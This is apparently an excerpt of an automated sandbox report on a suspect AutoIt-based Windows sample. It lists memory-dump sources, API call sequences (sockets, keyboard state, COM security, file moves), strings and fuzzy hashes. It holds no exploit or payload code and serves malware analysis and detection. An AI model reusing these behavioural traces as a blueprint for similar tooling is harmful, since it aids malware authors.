                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                                      • Instruction ID: 62d23c735b8524f03e68e08c489dd3de0b250face4f6c49e79fd8396272832c6
                                                                      • Opcode Fuzzy Hash: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                                      • Instruction Fuzzy Hash: 6F911571D40219EFCB14CFA9CC84AEEBBB8FF49320F148595E615B7251D7B4AA42CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00C2396B
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C23A7A
                                                                      • _wcslen.LIBCMT ref: 00C23A8A
                                                                      • VariantClear.OLEAUT32(?), ref: 00C23C1F
                                                                        • Part of subcall function 00C10CDF: VariantInit.OLEAUT32(00000000), ref: 00C10D1F
                                                                        • Part of subcall function 00C10CDF: VariantCopy.OLEAUT32(?,?), ref: 00C10D28
                                                                        • Part of subcall function 00C10CDF: VariantClear.OLEAUT32(?), ref: 00C10D34
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4137639002-1221869570
                                                                      • Opcode ID: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                                      • Instruction ID: fcabe4da6b58b6d1507983a4e233095037774fc98c98a31c83e3f65fa4de9a62
                                                                      • Opcode Fuzzy Hash: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                                      • Instruction Fuzzy Hash: 3091A874A083519FC700EF28C48096AB7E4FF89714F04896EF89A9B351DB34EE45CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C0000E: CLSIDFromProgID.OLE32 ref: 00C0002B
                                                                        • Part of subcall function 00C0000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C00046
                                                                        • Part of subcall function 00C0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                                        • Part of subcall function 00C0000E: CoTaskMemFree.OLE32(00000000), ref: 00C00064
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00C24C51
                                                                      • _wcslen.LIBCMT ref: 00C24D59
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C24DCF
                                                                      • CoTaskMemFree.OLE32(?), ref: 00C24DDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 614568839-2785691316
                                                                      • Opcode ID: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                                      • Instruction ID: 9a60d1484e589c82f320a290da3187752ec272ac3137ae5538000d29b474bbcb
                                                                      • Opcode Fuzzy Hash: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                                      • Instruction Fuzzy Hash: 30912671D00229AFDF14DFA4D891AEEB7B8BF08304F108569E915A7291DB749A44CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetMenu.USER32 ref: 00C32183
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00C321B5
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C321DD
                                                                      • _wcslen.LIBCMT ref: 00C32213
                                                                      • GetMenuItemID.USER32(?,?), ref: 00C3224D
                                                                      • GetSubMenu.USER32 ref: 00C3225B
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • PostMessageW.USER32 ref: 00C322E3
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 4196846111-0
                                                                      • Opcode ID: e1a3ad9099f8589763c86e2101724c51d665cf2db834dbcdea625737e9070b8a
                                                                      • Instruction ID: e34065f48aca57e778595f211cfbf21ac9f6ae9e3713d95bf07cd46a011a964b
                                                                      • Opcode Fuzzy Hash: e1a3ad9099f8589763c86e2101724c51d665cf2db834dbcdea625737e9070b8a
                                                                      • Instruction Fuzzy Hash: F7718F75A10205AFCF10EF65C885AAEB7F5EF48320F148499E826EB351DB35EE419F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                                      • Instruction ID: b8ec5d739811dc8055c08656f38617b21061b43704c18e89b1168cd593e8a618
                                                                      • Opcode Fuzzy Hash: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                                      • Instruction Fuzzy Hash: 1351B3E06147D63DFB368374CC45BBA7EA95B06304F088589F1E9954C2C398AED4D751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                                      • Instruction ID: 07e637615d420927c51a212f172b6e0e138876feb67c32d5cb36adf9bc7a18c7
                                                                      • Opcode Fuzzy Hash: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                                      • Instruction Fuzzy Hash: 7F51F5A15087D53DFB378334CC95BBABEA85B46300F088489E1F5568C3D294EE98E762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32 ref: 00BD5470
                                                                      • __fassign.LIBCMT ref: 00BD54EB
                                                                      • __fassign.LIBCMT ref: 00BD5506
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BE3CD6,00000005,00000000,00000000), ref: 00BD552C
                                                                      • WriteFile.KERNEL32(?,00BE3CD6,00000000,00BD5BA3,00000000), ref: 00BD554B
                                                                      • WriteFile.KERNEL32(?,?,00000001,00BD5BA3,00000000), ref: 00BD5584
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                                      • Instruction ID: 4ccc948a2ac78f6c59ba463e308bcf961e14d2cdffd417775d8d04c03c7e48b7
                                                                      • Opcode Fuzzy Hash: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                                      • Instruction Fuzzy Hash: 0551C2749006499FDB21CFA8D881BEEFBF9EF18300F14415BE555E7391E6309A41CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID: y7HR
                                                                      • API String ID: 4210589936-2878486218
                                                                      • Opcode ID: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                                      • Instruction ID: d52a739c84363192753db4955e1c1177b5bef627ae30259f41406995928ef0b8
                                                                      • Opcode Fuzzy Hash: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                                      • Instruction Fuzzy Hash: 33415F7190850AFBDF159F68C884BFEB7B4FF05320F208299E525B7290CB745A58EB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2D4B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC2D53
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2DE1
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC2E0C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00BC2E61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                                      • Instruction ID: f52b273df9e2acf505804c6209f24529f4e5c1611d653f36f83759c0509e1e7b
                                                                      • Opcode Fuzzy Hash: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                                      • Instruction Fuzzy Hash: F4418334A00209ABCF10DF68C885F9EBBF5FF55324F1481A9E915AB392D7319A15CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                        • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21121
                                                                      • WSAGetLastError.WSOCK32 ref: 00C211C9
                                                                      • closesocket.WSOCK32(00000000), ref: 00C211F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 2675159561-0
                                                                      • Opcode ID: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                                      • Instruction ID: 2f9dd9b1200aba4491b78a510259f9bb4d02dfdaaf36b1b35eed8ce29055ba87
                                                                      • Opcode Fuzzy Hash: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                                      • Instruction Fuzzy Hash: CB41F631600214AFDB109F24D885BAEBBE9FF55324F188059FD15AB292C774EE45CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C0CF45
                                                                      • MoveFileW.KERNEL32 ref: 00C0CF7F
                                                                      • _wcslen.LIBCMT ref: 00C0D005
                                                                      • _wcslen.LIBCMT ref: 00C0D01B
                                                                      • SHFileOperationW.SHELL32(?), ref: 00C0D061
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                                      • Instruction ID: c0dc893c3ae368f78847436c9c738578bf6e83e16137ccb8cc12c7ad33939441
                                                                      • Opcode Fuzzy Hash: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                                      • Instruction Fuzzy Hash: 0C4135B19452195EDF12EBA4D9C1FDEB7F9AF48380F1000E6E505EB182EB34A784DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C32E1C
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E84
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C32EB6
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C32EE0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32EF1
                                                                      • SetWindowLongW.USER32 ref: 00C32F0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                                      • Instruction ID: 3008aa586455a5e060c4d8c1ffc6e6fa1c3fa9f33e165d452efcf345e3627e39
                                                                      • Opcode Fuzzy Hash: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                                      • Instruction Fuzzy Hash: 9F311331614250AFDF20CF58DC86F6937E0EB8AB21F180164FA149B2B1CB71AD80DB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07769
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0778F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C07792
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C077B0
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C077B9
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C077DE
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C077EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 17e669798f938508394cd40b7d41f67695f38bc3922491c374f0fdfcebc54d79
                                                                      • Instruction ID: 8199827e888421cfbbdcfd2fc5d3970d44f1149c83da1c65fbf11d1c9f4fc373
                                                                      • Opcode Fuzzy Hash: 17e669798f938508394cd40b7d41f67695f38bc3922491c374f0fdfcebc54d79
                                                                      • Instruction Fuzzy Hash: 7421AE76A04219AFDB15DFACCC88EBF73ACEB093A4B008125BA14DB190D670ED41C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07842
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07868
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C0786B
                                                                      • SysAllocString.OLEAUT32 ref: 00C0788C
                                                                      • SysFreeString.OLEAUT32 ref: 00C07895
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C078AF
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C078BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 3010b2b3fb041219a69b9aa593a82c32573e6bbb45727fa50984a482ab441b0f
                                                                      • Instruction ID: aa6755d6097050df353d4b6701c2d92bf05519e9c5302b28a692278ddb49ea9c
                                                                      • Opcode Fuzzy Hash: 3010b2b3fb041219a69b9aa593a82c32573e6bbb45727fa50984a482ab441b0f
                                                                      • Instruction Fuzzy Hash: A1216531A04104AFDB149FA8DC88EBE77ECEB097607108225F915EB1E1D674ED41CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C104F2
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C1052E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
